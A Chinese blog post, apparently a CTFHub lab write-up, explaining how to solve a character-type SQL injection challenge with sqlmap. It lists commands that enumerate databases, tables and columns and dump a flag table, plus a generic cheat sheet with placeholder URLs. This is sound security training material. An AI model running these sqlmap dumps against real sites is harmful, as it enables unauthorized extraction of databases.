CTFHUB-SQL注入-字符型注入

最新推荐文章于 2024-09-02 07:02:10 发布
最新推荐文章于 2024-09-02 07:02:10 发布
阅读量356 收藏 5
点赞数 10
分类专栏: CTFHUB技能树 文章标签: sql 数据库 经验分享 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/139441414
版权

目录

查询数据库名

查询数据库中的表名

查询表中数据

总结

此题目和上一题相似,一个是整数型注入,一个是字符型注入。字符型注入就是注入字符串参数,判断回显是否存在注入漏洞。因为上一题使用手工注入查看题目 flag ,这里就不在使用手工注入,而是使用 sqlmap 工具完成

查询数据库名

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" --current-db

查询数据库中的表名

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables

查询表中数据

python sqlmap.py -u "http://challenge-22b4da99a0deeef4.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --dump

得到了flag

总结

判断是否存在注入

python sqlmap.py -u "http://xxx/?id=1"

查看当前数据库名称

python sqlmap.py -u "http://xxx/?id=1" --current-db

查看当前数据库的表

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 --tables

查看表中的字段名

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 -T 表名 --columns

查看表中的数据

python sqlmap.py -u "http://xxx/?id=1" -D 数据库名 -T 表名 --dump
燕雀安知鸿鹄之志哉.
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
二、sql注入(CTF技巧)
黑日里不灭的light
03-14 682
解释:在一些题目里面常常充满了各种各样的过滤,我们需要结合实际情况去进行注入,下面提供一些Payload以及适用场景。
CTFhub-sql注入-字符注入
ssss39的博客
08-23 110
1231 and 1=11 and 1=2。
CTFHUB - SQL注入-整数字符注入
m0_64180167的博客
11-28 2357
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHUB-SQL注入-整数注入(一)
sev1n的博客
03-01 2285
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回错误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
CTFHUB-SQL注入-字符
weixin_49539962的博客
07-31 153
和整数类似,只是从整数变成了字符。正常提交的时候我们无需管输入的是字符还是数字,但系统会添加单引号或者双引号,在注入的时候需要注意引号的闭合和注释。字符一般是使用单引号,sql语言的注释为“--”、“#”、“--+”。
CTFHUB-技能树-Web题-SQL注入-字符注入
Static______的博客
03-29 466
对于字符注入,可在url中输入。由此判断回显字段为1,2字段。由此判断字段数为两个。
CTFHUB-SQL字符注入
Web学习之路
03-07 313
很简单的,用心
CTFHub-sql注入
qq_60905276的博客
01-30 5747
1.整数注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
ctfhub-sql注入-字符注入
m0_62094846的博客
11-12 684
说明输入1不能给我们有用的信息,但输入1'会显示错误 查询字符注入,可以输入1"试试 没有报错(不过好像目前没什么用,确定字段数时用1’也一样),记得一定一定加#,不然没用 有2个字段数 确定回显位 语句只能放在第二个位上 查找数据库 猜测在sqli里 查找表 查找字段 ...
CTFHUB-web-SQL注入
ookami6497的博客
11-29 805
CTFHUB SQL
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1225
CTFHUB-WEB-SQL注入
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 422
个人CTF学习之路
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5440
Ctfhub解题 web SQL注入
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1103
ctfhubSQL注入中的flag是动态生成的 1、整数注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
SQL经典五十道选刷
m0_67496588的博客
08-31 988
SQL经典五十道选刷
MySQL数据库增删查改(基础)CRUD
最新发布
chendemingxxx的博客
09-02 1066
比如说:创建一张学生表,有姓名,学号。插入两个学生。可能有点草率看看例子: 顺序不是问题,后面参数和前面括号参数对等就行。比如说上面的例子:把id和name参数倒过来了,后面参数一一对应也可以。不推荐使用全列查询原因:比如说上面例子我只要id或者说只要name;当然也可以查询多个列: 比如说我们创建一个这样的表命令:第一个 效果:第三个总分效果:拓展一个现象: 拓展:语法:比较运算符:逻辑运算符:解释:%在mysql这里代表的是多个任意字符,_代表的是 一个任意字符。揭晓来才是修改硬盘里面的内容。案例:
九、安装artifactory并配置PostgreSQL--失败了
shafatudou的博客
09-01 1354
基于八,克隆出一个新的虚拟机,用来安装制品库并配置mysql数据库。仅参考,未使用(配置的centos自带的数据库,不会用)
ctfhub字符注入
09-18
ctfhub字符注入是一种常见的网络安全漏洞,针对的是Web应用程序中的输入字段,攻击者可以通过注入恶意字符实现对数据库的非法操作或获取敏感信息。 字符注入的原理是利用对用户输入数据的过滤不足,未对特殊...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值